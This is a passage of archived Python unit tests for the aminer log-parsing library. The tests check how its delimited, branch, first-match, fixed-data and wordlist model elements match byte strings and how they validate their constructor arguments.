delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"the searched file is .gitignore." value = b"the searched file is .gitignore" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test6special_characters_escape_no_match(self): """In this test case special character escaping is tested without matching.""" data = b'error: the command \\"python run.py\\" was not found\\" ' match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b'"', b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = rb"^This is a simple regex string. It costs 10\$.\$" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"$", b"\\") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"the searched file is .gitignore ." match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b".", b" ") match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7consume_delimiter(self): """In this test case check if the consume_delimiter parameter is working properly.""" data = b"this is a match context.\n" delimited_data_model_element = DelimitedDataModelElement(self.id_, b"a", consume_delimiter=True) value = b"this is a" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"c", consume_delimiter=True) value = b"this is a matc" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"e", consume_delimiter=True) value = b"this is a match conte" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"\n", consume_delimiter=True) value = b"this is a match context.\n" match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b" is", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"is", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) value = b"this is a match context.\n" match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"his is a match context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test8consume_delimiter_no_match(self): """In this test case check if the consume_delimiter parameter is working properly and does not match data.""" data = b"this is a match context.\n" for char in "bdfgjklpqruvwyz": delimited_data_model_element = DelimitedDataModelElement(self.id_, char.encode(), consume_delimiter=True) match_context = DummyMatchContext(data) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"other data", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"isa", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"context\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) delimited_data_model_element = DelimitedDataModelElement(self.id_, b"this is a match context.\n", consume_delimiter=True) match_element = delimited_data_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test9element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DelimitedDataModelElement, "", self.delimiter) # empty element_id self.assertRaises(TypeError, DelimitedDataModelElement, None, self.delimiter) # None element_id self.assertRaises(TypeError, DelimitedDataModelElement, b"path", self.delimiter) # bytes element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, True, self.delimiter) # boolean element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, 123, self.delimiter) # integer element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, 123.22, self.delimiter) # float element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, {"id": "path"}, self.delimiter) # dict element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, ["path"], self.delimiter) # list element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, [], self.delimiter) # empty list element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, (), self.delimiter) # empty tuple element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, set(), self.delimiter) # empty set element_id is not allowed def test10escape_input_validation(self): """Check if escape is validated.""" self.assertRaises(ValueError, DelimitedDataModelElement, self.id_, self.delimiter, escape=b"") # empty escape self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape="\\") # string escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=True) # boolean escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=123) # integer escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=123.22) # float escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape={"id": "path"}) # dict escape not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=["path"]) # list escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=[]) # empty list escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=()) # empty tuple escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=set()) # empty set escape is not allowed def test11consume_delimiter_input_validation(self): """Check if consume_delimiter is validated.""" self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=b"") self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter="\\") self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=123) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=123.22) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter={"id": "path"}) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=["path"]) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=[]) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=()) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=set()) def test12get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DelimitedDataModelElement(self.id_, self.delimiter) data = b"one, two, three" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/ElementValueBranchModelElementTest.py000066400000000000000000000312041437606560100326400ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class ElementValueBranchModelElementTest(TestBase): """Unittests for the ElementValueBranchModelElement.""" id_ = "value_branch" path = "path" value_path = "value_model" path_path = b"path: " data_path = b"data: " path_fixed_string = b"/model" data_fixed_string = b"this is some random data: 255." value_model = DummyFirstMatchModelElement( "branch", [DummyFixedDataModelElement("path", path_path), DummyFixedDataModelElement("data", data_path)]) path_me = DummyFixedDataModelElement(value_path, path_fixed_string) data_me = DummyFixedDataModelElement(value_path, data_fixed_string) children = [value_model, path_me, data_me] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" element_value_branch_me = ElementValueBranchModelElement( self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"path: /model" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ MatchElement("path/value_branch/branch/path", self.path_path, self.path_path, None), MatchElement("path/value_branch/value_model", self.path_fixed_string, self.path_fixed_string, None)]) data = b"data: this is some random data: 255." match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ MatchElement("path/value_branch/branch/data", self.data_path, self.data_path, None), MatchElement("path/value_branch/value_model", self.data_fixed_string, self.data_fixed_string, None)]) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" element_value_branch_me = ElementValueBranchModelElement( self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"path: /random" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"path: this is some random data: 255." match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"data: /model" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"path: " match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"data: " match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(ValueError, ElementValueBranchModelElement, "", self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, None, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, b"path", self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, True, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 123, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 123.22, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, {"id": "path"}, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, ["path"], self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, [], self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, (), self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, set(), self.value_model, None, branch_model_dict) def test4value_model_input_validation(self): """Check if value_model is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, "path", None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, None, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, b"path", None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, True, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, 123, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, 123.22, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, True, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, {"id": "path"}, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, ["path"], None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, [], None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, (), None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, set(), None, branch_model_dict) def test5value_path_input_validation(self): """Check if value_path is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(ValueError, ElementValueBranchModelElement, self.id_, self.value_model, "", branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, b"path", branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, True, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, 123, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, 123.22, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, {"id": "path"}, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, ["path"], branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, [], branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, (), branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, set(), branch_model_dict) def test6branch_model_dict_input_validation(self): """Check if value_path is validated.""" self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, "path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, None) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, b"path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, True) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, 123) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, 123.22) # dict branch_model_dict without ModelElementInterface values is not allowed self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, {"id": "path"}) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, ["path"]) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, []) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, ()) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, set()) def test7default_branch_input_validation(self): """Check if value_path is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, "path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, b"path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, True) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, 123) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, 123.22) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, {"id": "path"}) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, ["path"]) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, []) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, ()) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, set()) def test8get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = ElementValueBranchModelElement(self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/FirstMatchModelElementTest.py000066400000000000000000000174771437606560100312200ustar00rootroot00000000000000import unittest from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class FirstDataModelElementTest(TestBase): """Unittests for the FirstDataModelElement.""" id_ = "first" path = "path" me1 = DummyFixedDataModelElement("me1", b"The first fixed string.") me2 = DummyFixedDataModelElement("me2", b"Random string23.") me3 = DummyFixedDataModelElement("me3", b"Random string2") children = [me1, me2, me3] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"The first fixed string. Random string23." value = b"The first fixed string." match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_+"/me1", self.path, value, value, None) data = b"Random string23. Random string23." value = b"Random string23." match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me2", self.path, value, value, None) data = b"Random string2 Random string23." value = b"Random string2" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me3", self.path, value, value, None) data = b"Random string24. Random string23." value = b"Random string2" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me3", self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"some none matching string" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"The first fixed string" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"Random string42" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FirstMatchModelElement, "", self.children) # empty element_id self.assertRaises(TypeError, FirstMatchModelElement, None, self.children) # None element_id self.assertRaises(TypeError, FirstMatchModelElement, b"path", self.children) # bytes element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, True, self.children) # boolean element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, 123, self.children) # integer element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, 123.22, self.children) # float element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, {"id": "path"}, self.children) # dict element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, ["path"], self.children) # list element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, [], self.children) # empty list element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, (), self.children) # empty tuple element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, set(), self.children) # empty set element_id is not allowed def test4children_input_validation(self): """Check if children is validated.""" self.assertRaises(TypeError, FirstMatchModelElement, self.id_, "path") # string children self.assertRaises(TypeError, FirstMatchModelElement, self.id_, None) # None children self.assertRaises(TypeError, FirstMatchModelElement, self.id_, b"path") # bytes children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, True) # boolean children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, 123) # integer children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, 123.22) # float children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, {"id": "path"}) # dict children is not allowed # list children with no ModelElementInterface elements is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, ["path"]) self.assertRaises(ValueError, FirstMatchModelElement, self.id_, []) # empty list children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, ()) # empty tuple children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, set()) # empty set children is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FirstMatchModelElement(self.id_, self.children) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/FixedDataModelElementTest.py000066400000000000000000000133401437606560100307660ustar00rootroot00000000000000import unittest from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class FixedDataModelElementTest(TestBase): """Unittests for the FixedDataModelElement.""" data = b"fixed data. Other data." id_ = "fixed" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with the fixed string.""" fixed_string = b"fixed data." fixed_dme = FixedDataModelElement(self.id_, fixed_string) match_context = DummyMatchContext(self.data) match_element = fixed_dme.get_match_element(self.path, match_context) self.compare_match_results(self.data, match_element, match_context, self.id_, self.path, fixed_string, fixed_string, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" no_match_string = b"Hello World." match_context = DummyMatchContext(self.data) fixed_dme = FixedDataModelElement(self.id_, no_match_string) match_element = fixed_dme.get_match_element(self.path, match_context) self.compare_no_match_results(self.data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FixedDataModelElement, "", self.data) # empty element_id self.assertRaises(TypeError, FixedDataModelElement, None, self.data) # None element_id self.assertRaises(TypeError, FixedDataModelElement, b"path", self.data) # bytes element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, True, self.data) # boolean element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, 123, self.data) # integer element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, 123.22, self.data) # float element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, {"id": "path"}, self.data) # dict element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, ["path"], self.data) # list element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, [], self.data) # empty list element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, (), self.data) # empty tuple element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, set(), self.data) # empty set element_id is not allowed def test4fixed_data_input_validation(self): """Check if fixed_data is validated.""" self.assertRaises(ValueError, FixedDataModelElement, self.id_, b"") # empty fixed_string self.assertRaises(TypeError, FixedDataModelElement, self.id_, None) # None fixed_string self.assertRaises(TypeError, FixedDataModelElement, self.id_, "path") # string fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, True) # boolean fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, 123) # integer fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, 123.22) # float fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, {"string": "string"}) # dict fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, ["path"]) # list fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, []) # empty list fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, ()) # empty tuple fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, set()) # empty set fixed_string is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FixedDataModelElement(self.id_, self.data) data = self.data model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/FixedWordlistDataModelElementTest.py000066400000000000000000000170371437606560100325250ustar00rootroot00000000000000import unittest from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class FixedWordlistDataModelElementTest(TestBase): """Unittests for the FixedWordlistDataModelElement.""" id_ = "wordlist" path = "path" wordlist = [b"wordlist", b"word"] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"wordlist, word" index = 0 value = b"wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) data = b"word, wordlist" index = 1 value = b"word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"string wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"wor wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0 wordlist" match_context = 